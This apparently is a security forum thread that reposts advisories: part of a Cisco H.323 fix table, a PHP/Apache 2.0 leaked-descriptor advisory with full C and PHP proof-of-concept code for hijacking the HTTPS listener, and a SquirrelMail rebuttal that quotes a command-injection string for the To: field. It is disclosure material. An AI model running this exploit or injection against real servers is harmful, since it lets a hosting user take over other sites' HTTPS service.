| 12.2CX | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2CY | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2DA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2DD | | Vulnerable. Migrate to 12.3(1a) |
|--------+---------------+----------------------------------------|
| 12.2DX | | Vulnerable. Migrate to 12.3(1a) |
|--------+---------------+----------------------------------------|
| 12.2JA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2MB | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| 12.2MC | | |
| | | No planned release |
|--------+---------------+----------------------------------------|
| 12.2MX | | Vulnerable. Migrate to 12.3(4)T1 |
|--------+---------------+----------------------------------------|
| | Element | 12.2(14)S3 | | 12.2(1 :: S |
| |---------------+-------------+-----------+--------------|
| | | 12.2(14)S7 | | |
| | | - available | | |
| | | 19-Jan-2004 | | |
| 12.2S | NAT | | | |
| | | 12.2(1 :: S3 | | |
| | | - available | | |
| | | 23-Feb-2004 | | |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | Element | 12.2(17a) | | |
| | | SXA | | |
| |---------------+-------------+-----------+--------------|
| 12.2SX | NAT | 12.2(17a) | | |
| | | SXA | | |
| |---------------+----------------------------------------|
| | IPFW | TBD |
|--------+---------------+----------------------------------------|
| 12.2SY | | 12.2(14)SY3 | | |
|--------+---------------+----------------------------------------|
| 12.2SZ | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | | | No more |
| | | 12.2(4)T6, | | maintenance |
| | | | | trains for |
| | | 12.2( :: T10, | | 12.2T are |
| | | | | planned. |
| | Element | 12.2(11)T9, | | Please |
| | | | | migrate to |
| | | 12.2(13)T5, | | the latest |
| | | | | 12.3 |
| | | 12.2(15)T2 | | Mainline |
| | | | | release. |
| |---------------+-------------+-----------+--------------|
| | | | | No more |
| | | 12.2(4)T6, | | maintenance |
| | | | | trains for |
| | | 12.2( :: T10, | | 12.2T are |
| | | | | planned. |
| 12.2T | NAT | 12.2(11)T8, | | Please |
| | | | | migrate to |
| | | 12.2(13)T3, | | the latest |
| | | | | 12.3 |
| | | 12.2(15)T5 | | Mainline |
| | | | | release. |
| |---------------+-------------+-----------+--------------|
| | | | | No more |
| | | | | maintenance |
| | | | | trains for |
| | | | | 12.2T are |
| | | | | planned. |
| | IPFW | 12.2(4)T8 | | Please |
| | | | | migrate to |
| | | | | the latest |
| | | | | 12.3 |
| | | | | Mainline |
| | | | | release. |
|--------+---------------+----------------------------------------|
| 12.2XA | | Vulnerable. Migrate to 12.2(11)T9 |
|--------+---------------+----------------------------------------|
| 12.2XB | | Vulnerable. Migrate to 12.2(2)XB14 |
|--------+---------------+----------------------------------------|
| 12.2XC | | Vulnerable. Migrate to 12.3(1a) |
|--------+---------------+----------------------------------------|
| 12.2XD | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XE | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2XF | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2XG | | Vulnerable. Migrate to 12.2( :: T10 |
|--------+---------------+----------------------------------------|
| 12.2XH | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XI | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XJ | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XK | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XL | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XM | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XN | | Vulnerable. Migrate to 12.2(11)T9 |
|--------+---------------+----------------------------------------|
| 12.2XQ | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XS | | Vulnerable. Migrate to 12.2(2)XB14 |
|--------+---------------+----------------------------------------|
| 12.2XT | | Vulnerable. Migrate to 12.2(11)T9 |
|--------+---------------+----------------------------------------|
| 12.2XU | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2XW | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| | Element | 12.2(4)YA7 | | |
| |---------------+----------------------------------------|
| 12.2YA | NAT | Not Vulnerable |
| |---------------+----------------------------------------|
| | IPFW | 12.2(4)YA8 | | |
|--------+---------------+----------------------------------------|
| 12.2YB | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2YC | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2YD | | Vulnerable. Migrate to 12.3(2)T3 |
|--------+---------------+----------------------------------------|
| 12.2YE | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2YF | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2YG | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2YH | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2YJ | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2YK | | Vulnerable. Migrate to 12.2(13)ZC |
|--------+---------------+----------------------------------------|
| 12.2YL | | Vulnerable. Migrate to 12.3(2)T3 |
|--------+---------------+----------------------------------------|
| 12.2YM | | Vulnerable. Migrate to 12.3(2)T3 |
|--------+---------------+----------------------------------------|
| 12.2YN | | Vulnerable. Migrate to 12.3(2)T3 |
|--------+---------------+----------------------------------------|
| 12.2YO | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2YP | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2YQ | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2YR | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2YS | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2YT | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.2YU | | Vulnerable. Migrate to 12.3(4)T1 |
|--------+---------------+----------------------------------------|
| 12.2YV | | Vulnerable. Migrate to 12.3(4)T1 |
|--------+---------------+----------------------------------------|
| | Element | 12.2( :: YW3 | | |
| |---------------+-------------+-----------+--------------|
| 12.2YW | NAT | 12.2( :: YW3 | | |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | Migrate to 12.2(S) Release 3 |
| 12.2YX | | |
| | | or migrate to 12.2(14)SU March-2004 |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| 12.2YY | | |
| | | Migrate to 12.3(2)T3 |
|--------+---------------+----------------------------------------|
| 12.2YZ | | Vulnerable. Rebuilds available upon |
| | | request. |
|--------+---------------+----------------------------------------|
| 12.2ZA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| 12.2ZB | | |
| | | Migrate to 12.3(2)T3 |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| 12.2ZC | | |
| | | Not yet planned |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| | | |
| 12.2ZD | | No Migration path |
| | | |
| | | No planned fix |
|--------+---------------+----------------------------------------|
| 12.2ZE | | Vulnerable. Migrate to 12.3(1a) |
|--------+---------------+----------------------------------------|
| 12.2ZF | | Vulnerable. Migrate to 12.2(15)SL1 |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| | | |
| 12.2ZG | | No Migration path |
| | | |
| | | No planned fix |
|--------+---------------+----------------------------------------|
| | Element | 12.2(13)ZH3 | | |
| |---------------+-------------+-----------+--------------|
| 12.2ZH | NAT | | | |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | Element | 12.2(15)ZJ3 | | |
| |---------------+-------------+-----------+--------------|
| 12.2ZJ | NAT | 12.2(15)ZJ2 | | |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | Element | 12.2(15)ZL1 | | |
| |---------------+-------------+-----------+--------------|
| 12.2ZL | NAT | | | |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2ZM | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2ZP | | Not Vulnerable |
|------------------------+----------------------------------------|
| 12.3-based Releases | Rebuild | Interim | Maintenance |
|------------------------+----------------------------------------|
| 12.3 | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | Element | Not Vulnerable to H.323 endpoint/ |
| | | gateway/gatekeeper issues |
| |---------------+----------------------------------------|
| 12.3T | | 12.3(2)T3 | | |
| | NAT | | | |
| | | 12.3(4)T1 | | |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable to IOS FW issue |
+-----------------------------------------------------------------+



Cisco Software - Non IOS

In all cases, customers should exercise caution to confirm that the
devices to be upgraded contain sufficient memory and that current hardware
and software configurations will continue to be supported properly by the
new software release. If the information is not clear, contact the Cisco
TAC for assistance as shown in the Obtaining Fixed Software section.


Cisco CallManager

+------------------------------------------+
| Cisco CallManager | First Fixed Regular |
| Version | Release |
|--------------------+---------------------|
| 3.1 | 3.1(4b)spD |
|--------------------+---------------------|
| 3.2 | 3.2(3) |
|--------------------+---------------------|
| | 3.3(2)spC |
| 3.3 | |
| | 3.3(3) |
+------------------------------------------+


Cisco Conference Connection

There are currently no software fixes planned for Cisco Conference
Connection (CCC). Customers running CCC should implement a workaround to
limit H.323 traffic from trusted hosts only. A workaround for this may be
found in the Workarounds section.


Cisco Internet Service Node

There are currently no software fixes planned for Cisco Internet Service
Node (ISN). Customers running ISN should implement a workaround to limit
H.323 traffic from trusted hosts only. A workaround for this may be found
in the Workarounds section.


Cisco 7905 Series IP Phone

These defects have been resolved in Version 1.0(1) of the 7905 H.323 phone
firmware load. The version 1.0(1) image names containing the fixes are
cp790501001h323031212a.sbin for the signed image and
cp790501001h323031212a.zup for the unsigned image.


Cisco ATA18x Series Analog Telephony Devices

These defects have been resolved in software version 2.16.1.


Cisco BTS 10200

The Cisco BTS 10200 has software fixes available in version 4.1. Customers
who have deployed the BTS 10200 should follow the instructions below in
the Obtaining Fixed Software section to contact TAC in order to obtain the
fixed software version.

Obtaining Fixed Software
========================

Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com/.

Customers whose Cisco products are provided or maintained through prior or
existing agreement with third-party support organizations such as Cisco
Partners, authorized resellers, or service providers should contact that
support organization for assistance with the upgrade, which should be free
of charge.

Customers who purchase direct from Cisco but who do not hold a Cisco
service contract and customers who purchase through third-party vendors
bu

----------


## Mick Flemm

*PHP 4.2.x / 4.3.x @ Apache 2.0*


Product: PHP - mod_php
Versions: 4.2.x, 4.3.x / apache 2.0.x
URL: http://www.php.net
Impact: Daemon Hijacking
Bug class: Leaked Descriptor
Vendor notified: Yes
Fix available: No
Date: 12/26/03


Issue:
======
Mod_php under apache 2.0.x leaks a critical file descriptor that can be used to takeover (hijack) the https service.


Details:
========
Because apache httpd and mod_php are inter-related, I
don't know if you would consider this an apache bug or
a mod_php bug. I've contacted each group and they both 
blame each other. Personally, I don't care whose fault 
it is so long as it gets fixed.

When using mod_php, many file descriptors are leaked to the php script process. If the script page calls external programs by passthru(), exec(), or system(), the descriptors are leaked to that program as well.

One of these descriptors is the listening descriptor to port 443, also known as https. Port 443 is a privileged port and can only be bound to by a root process. It is not normal for that descriptor to be leaked to any or all programs. As a side note, this descriptor seems to be opened by apache regardless of whether or not you use https.

The bug is caused by not making a call to fcntl with the CLOEXEC flag to prevent the leak of a privileged file descriptor. ( It really is a 1 line fix ! )


Impact:
=======
The listening descriptor is used by all sites on the same machine. If a person can ftp in an executable and has access to php, they may be able to hijack the https service for all sites on the machine. Sandboxing and jailing may not help since the descriptor itself is leaked to the child.

"Safe_mode = on" does not offer any protection for this 
problem if safe_mode_exec_dir points to a directory hat 
can be ftp'd to.


Exploit:
========
The technique is simple. 

1) Fork and daemonize yourself.
2) Select on the leaked descriptor and start serving pages.

At the end of this advisory is a proof-of-concept program that you can run under mod_php. It is assumed that paying customers can ftp anything they want into their website and mod_php scripting is enabled.

To see the problem first hand, compile the C code:

gcc -o leak-sploit leak-sploit.c -lssl
cp leak-sploit /var/www/html
cp install.php /var/www/html
cp foo-cert.pem /var/www/html

lynx http://localhost/install.php

Now, ps -ef to see how things are going:

root 18176 1 6 15:58 ? 00:00:01 /usr/sbin/httpd
apache 18180 18176 0 15:58 ? 00:00:00 /usr/sbin/httpd
apache 18181 18176 0 15:58 ? 00:00:00 /usr/sbin/httpd
apache 18182 18176 0 15:58 ? 00:00:00 /usr/sbin/httpd
apache 18183 18176 0 15:58 ? 00:00:00 /usr/sbin/httpd
apache 18184 18176 0 15:58 ? 00:00:00 /usr/sbin/httpd
apache 18191 1 0 15:58 ? 00:00:00 /var/www/html/leak-sploit

So far, so good...

lynx https://localhost
And you should see the "You're owned" message.

This was tested on a fully up2date Red Hat 8.0 & 9 system.


Solution:
=========
There is no vendor provided solution.

I filed http://bugs.php.net/bug.php?id=20302 on Nov 7, 2002. In retrospect, the bug report is not as detailed as I would like it to have been today, but no one from the php project seemed genuinely interested in investigating this problem.

I also contacted the apache project in August 2002 about this same problem. In October 2002, I re-contacted them about leaked descriptors, they confirmed the problem. Feb 2003 the leaked file descriptors were reported by myself to vuln-dev mail list. The bug was partially fixed in apache 2.0.45. The 
mod_php vector however is still unfixed.

To see if you are vulnerable, you can use the env_audit program. It comes with directions for testing mod_php in the examples directory.

http://www.web-insights.net/env_audit


Best Regards,
Steve Grubb


The code................

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <openssl/ssl.h>

/*
* The basic actions are like this:
* 1) Become session leader
* 2) Get rid of the parent (apache)
* 3) Start handling requests
*/

#define LISTEN_DESCRIPTOR 4
#define CERTF "/var/www/html/foo-cert.pem"
#define KEYF "/var/www/html/foo-cert.pem"

static SSL_CTX *ctx;
static SSL *ssl;
static X509 *client_cert;
static SSL_METHOD *meth;

static void server_loop(int descr);
static void ssl_init(void);

int main(int argc, char *argv[])
{
/* Need to fork so apache doesn't kill us */
if (fork() == 0) {
/* Become session leader */
setsid();
sleep(2);

/* just in case one was a controlling tty */
close(0); close(1); close(2);
ssl_init();
server_loop(LISTEN_DESCRIPTOR);
}
else
{
sleep(1);
system("/usr/sbin/httpd -k stop");
sleep(1);
}
return 0;
}

static void server_loop(int descr)
{
struct timeval tv;
fd_set read_mask ;

FD_ZERO(&read_mask);
FD_SET(descr, &read_mask);
for (; ::  {
struct sockaddr_in remote;
socklen_t len = sizeof(remote);
int fd;

if (select(descr+1, &read_mask, NULL, NULL, 0 ) == -1)
continue;
fd = accept(descr, &remote, &len);
if (fd >=0) {
char obuf[1024];
if ((ssl = SSL_new (ctx)) != NULL) {
SSL_set_fd (ssl, fd);
SSL_set_accept_state(ssl);
if ((SSL_accept (ssl)) == -1)
exit(1);

strcpy(obuf, "HTTP/1.0 200 OK\n");
strcat(obuf, "Content-Length: 40\n");
strcat(obuf, "Content-Type: text/html\n\n");
strcat(obuf, "<html><body>You're owned!</body></html>");
SSL_write (ssl, obuf, strlen(obuf));
SSL_set_shutdown(ssl,
SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
SSL_free (ssl);
ERR_remove_state(0);
}
close(fd);
}
}
SSL_CTX_free (ctx); /* Never gets called */
}

static void ssl_init(void)
{
SSL_load_error_strings();
SSLeay_add_ssl_algorithms();
meth = SSLv23_server_method();
ctx = SSL_CTX_new (meth);
if (!ctx)
exit(1);
if (SSL_CTX_use_certificate_file(ctx, CERTF,
SSL_FILETYPE_PEM) <= 0)
exit(1);
if (SSL_CTX_use_PrivateKey_file(ctx, KEYF,
SSL_FILETYPE_PEM) <= 0)
exit(1);
if (!SSL_CTX_check_private_key(ctx))
exit(1);
}


install.php.....

<html><head>
<title>leak-sploit for PHP 4.3</title>
</head>
<body>
<?php
print('Installing exploit.
');
passthru("/var/www/html/leak-sploit");
?>
</body></html>

----------


## Mick Flemm

*Squirelmail*


Bugtraq Security Systems released an advisory on Dec 24th to the Full
Disclosure email list about a possible Command Injection Issue in the GPG
subsystem of Squirrelmail. Please note that Bugtraq Security Systems Inc
has no affiliation with the well-regarded official Bugtraq list at
securityfocus.com.

Original full text of the advisory here:
http://www.bugtraq.org/advisories/_BSSADV-0001.txt
"Command Injection Issue in Squirrelmail"
and here:
http://archives.neohapsis.com/archives/ ... /3777.html
"Bugtraq Security Systems XMAS Advisory 0001"

Secundia also copied it here:
http://www.secunia.com/advisories/10493/
"Squirrelmail Address Parsing Execution of Arbitrary Commands"

There are many problems with this 'advisory'. We'll deal with the
technical details first, and then move on to the rest of it.

Summary:
The authors of the original 'advisory' claim arbitrary code execution with
the currently released version of Squirrelmail and the GPG Plugin. This
is false. They also claim arbitrary code execution with current CVS
version of the Squirrelmail and GPG code. This is also false. They
further claim to have attempted to contact the Squirrelmail 'product team'
'several times' before releasing their vulnerability report. This is also
false. No attempt was made to contact any member of the GPG Plugin
team, nor was any contact made with members of the core Squirrelmail
development team or any of the Squirrelmail development lists.

Despite these inaccuracies and the carefully timed release of a faulty
'advisory' during the Christmas holiday, we looked into it immediately.

Details:
> Adding a ";command;" to the To: line of a newly created e-mail and
> then clicking "encrypt now" will execute the command as the Apache
> user on recent versions of Squirrelmail, including the current CVS
> version. Example:
>
> To: ;echo "YO, dudes. Static analysis ain't rocket science." >>
> /tmp/message;
> <click encrypt now to execute!>

Upon digging further, we have discovered that the code for the reported
exploit existed within Squirrelmail itself, previous to version 1.4.2
during the address parsing.

This is within the rfc822Header object, using the parseAddress function.
The parseAddress code in Squirrelmail 1.4.0 does not properly completely
remove the command noted in the 'advisory' and previous comments. 
However, even Squirrelmail 1.4.0 does munge the attack enough to not
exactly function the way the 'advisory' claims.

It is possible that an exploit similar to the one reported in the
'advisory' could potentially be exploitable with GPG Plugin v 1.1 and SM v
1.4.0.

As of Squirrelmail 1.4.2 this attack is completely unsuccessful.

Squirrelmail 1.4.2 was released on Oct 01, 2003.

Since squirrelmail 1.4.2 contains other security updates, and has been
released for some time, it is HIGHLY recommended that administrators
upgrade immediately anyway.

We plan to investigate this issue more thoroughly in the next day or two,
and potentially update the Squirrelmail parseAddress function to even more
robustly handle potentially malicious code.

Updates as we continue to work towards further securing the GPG Plugin and
the Squirrelmail parseAddress function will be posted on the GPG Plugin
Bugzilla at:

http://www.braverock.com/bugzilla/show_bug.cgi?id=139

> This particular example is within the GPG subsystem of
> Squirrelmail, often installed by security "experts"
> who in actuality have the information security knowledge of
> cat food.

The GPG Plugin for Squirrelmail is not intended for 'security experts'. 
The GPG Plugin is a convenience feature only for the 'average' web mail
user. It does not claim to be a super high security method of encrypting
email. It is better than sending postcards across the network. The
documentation and online help for the GPG Plugin explicitly warn users
against storing their primary private keys (if they have them) on an
untrusted or unsecured webmail server. The GPG Plugin for Squirrelmail is
not intended to replace or remove the need for stand-alone, off-line key
management and basic key security for mission critical keys.

> The pictures located at http://www.bugtraq.org/images/demo1.png and
> http://www.bugtraq.org/images/demo2.png demonstrate the newest Bugtraq
> Security Systems software analysis platform. This product, BSS Data
> Tracer, allows a software security analysis team to perform automated
> checks against many common types of vulnerabilities in both binary and
> source code targets.
>
> As the screen shots referenced above show, this product can save
> thousands of hours of testing and analysis, providing a significant
> return on investment for software development groups. It uses
> "tainting" technology which applies data-flow analysis rules to
> variables within the program. If a "tainted" variable reaches a
> vulnerable API call, such as exec, system, or strcpy, then that place
> is marked. A report is then generated for the perusal of security
> staff. It should be noted that Bugtraq Security Systems Data Tracer is
> a "static analysis" tool, and does not require the program to be
> installed or run.

We do not appreciate your grand-standing for product placement.

Please get your facts straight.

> Bugtraq Security have attempted to contact the vendor multiple times
> since the discovery of these vulnerabilities without success. In
> addition, after contacting Weld Pond and Pieter Mudge Zatko

My email and the email of the GPG Plugin team are clearly indicated in the
GPG Plugin README, and on the Squirrelmail web site. No one attempted to
contact me or any member of the GPG Plugin team on this issue.

Further, no attempt was made by 'Bugtraq Security Inc' to contact any of
the official Squirrelmail lists. Communication with the Squirrelmail
development team leads confirms that none of them were contacted either.

Other individuals that the 'advisory' claims were contacted have also
responded that they were not contacted about this release.

So, to summarize the technical issues, the vulnerability reported in the
'advisory' is not completely valid at all, but could potentially be
exploitable with GPG Plugin v 1.1 and SM v 1.4.0. Please note that these
are old versions of both the Squirrelmail code and the GPG Plugin. The
claim in the 'advisory' that a vulnerability exists: 'on recent versions
of Squirrelmail, including the current CVS version.' is just plain false.

To the members of the "Bugtraq Research Team": The members of the GPG
Plugin and Squirrelmail development teams feel that it is a bad policy to
release 'advisories' with so many inaccuracies and outright lies. Please
refrain from doing so in the future.

Regards,

- Brian Peterson
GPG Plugin Team Lead
Squirrelmail Core Development Team Member

SquirrelMail is a popular standards-based webmail package written in PHP4.
It includes built-in pure PHP support for the IMAP and SMTP protocols.

It is available at:
http://www.squirrelmail.org/

The GPG Plugin for Squirrelmail adds most commonly used GPG encryption and
decryption functions to Squirrelmail for the convenience of Squirrelmail
users. It is available on the Squirrlemail website and from the GPG
Plugin development site at:
http://www.braverock.com/gpg/

----------


## Exoticom

*ProFTPD Critical Bugs* 

http://proftpd.linux.co.uk/critbugs.html
http://xforce.iss.net/xforce/alerts/id/154

----------


## Mick Flemm

Deprecated...

----------

